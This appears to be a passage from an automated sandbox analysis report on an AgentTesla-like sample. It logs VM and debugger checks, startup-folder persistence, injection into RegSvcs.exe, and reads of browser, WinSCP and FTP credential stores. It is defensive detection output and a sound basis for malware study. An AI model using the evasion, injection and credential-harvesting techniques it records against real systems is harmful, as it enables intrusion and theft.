                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597813Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597688Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597563Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597438Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596835Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596717Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596511Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596404Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596297Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596188Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596063Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595938Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595828Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595719Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593831Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593703Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593594Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593485Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599890Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599781Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599328Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599219Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598983Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598764Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598546Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598437Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598317Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598091Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597090Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596547Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596422Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595969Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595859Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595750Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595640Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595531Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595421Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595312Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595203Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594984Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594875Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594765Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594656Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594547Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: RegSvcs.exe, 00000006.00000002.4471177683.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: wscript.exe, 00000004.00000002.2168277804.0000017FEF6A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 00000006.00000002.4471177683.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: cunila.exe, 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: hgfsZrw6
                    Source: cunila.exe, 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: wscript.exe, 00000004.00000002.2168277804.0000017FEF6A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 00000003.00000002.2193400109.0000000005A8C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllB
                    Source: RegSvcs.exe, 00000006.00000002.4473771920.0000000005D60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\SAL987656700.exeAPI call chain: ExitProcess graph end nodegraph_0-98797
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeAPI call chain: ExitProcess graph end node

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00A17070 CheckRemoteDebuggerPresent,3_2_00A17070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008FEAA2 BlockInput,0_2_008FEAA2
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008B2622
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008842DE
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A4CE8 mov eax, dword ptr fs:[00000030h]0_2_008A4CE8
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_01394098 mov eax, dword ptr fs:[00000030h]0_2_01394098
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_01395738 mov eax, dword ptr fs:[00000030h]0_2_01395738
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_013956D8 mov eax, dword ptr fs:[00000030h]0_2_013956D8
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00544CE8 mov eax, dword ptr fs:[00000030h]2_2_00544CE8
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_015CA2F8 mov eax, dword ptr fs:[00000030h]2_2_015CA2F8
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_015CA298 mov eax, dword ptr fs:[00000030h]2_2_015CA298
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_015C8C58 mov eax, dword ptr fs:[00000030h]2_2_015C8C58
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 5_2_01327D20 mov eax, dword ptr fs:[00000030h]5_2_01327D20
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 5_2_01326680 mov eax, dword ptr fs:[00000030h]5_2_01326680
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 5_2_01327CC0 mov eax, dword ptr fs:[00000030h]5_2_01327CC0
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_008E0B62
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008B2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008B2622
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008A083F
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A09D5 SetUnhandledExceptionFilter,0_2_008A09D5
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008A0C21
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00552622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00552622
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_0054083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0054083F
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_005409D5 SetUnhandledExceptionFilter,2_2_005409D5
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeCode function: 2_2_00540C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00540C21
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Maps a DLL or memory area into another process
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and writeJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 5CC008Jump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 9FE008Jump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,74745590,CreateProcessAsUserW,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,0_2_008E1201
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008C2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_008C2BA5
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008EB226 SendInput,keybd_event,0_2_008EB226
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_009022DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_009022DA
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\SAL987656700.exe"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\enterogenous\cunila.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\enterogenous\cunila.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\enterogenous\cunila.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_008E0B62
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008E1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_008E1663
                    Source: SAL987656700.exe, 00000000.00000002.2026164990.0000000000942000.00000040.00000001.01000000.00000003.sdmp, cunila.exe, 00000002.00000002.2046156947.00000000005E2000.00000040.00000001.01000000.00000004.sdmp, cunila.exe, 00000005.00000002.2189121086.00000000005E2000.00000040.00000001.01000000.00000004.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
                    Source: SAL987656700.exe, cunila.exeBinary or memory string: Shell_TrayWnd
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008A0698 cpuid 0_2_008A0698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008F8195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_008F8195
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008DD27A GetUserNameW,0_2_008DD27A
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008BB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_008BB952
                    Source: C:\Users\user\Desktop\SAL987656700.exeCode function: 0_2_008842DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_008842DE
                    Source: C:\Users\user\Desktop\SAL987656700.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 5.2.cunila.exe.39b0000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.cunila.exe.39b0000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegSvcs.exe.3b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.cunila.exe.3970000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.cunila.exe.3970000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.4471177683.0000000002B7E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2189912177.0000000002621000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2189912177.000000000264E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2186790443.00000000003B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.4471177683.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2047345066.0000000003970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2193256608.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 7164, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2316, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: cunila.exe PID: 1276, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5376, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
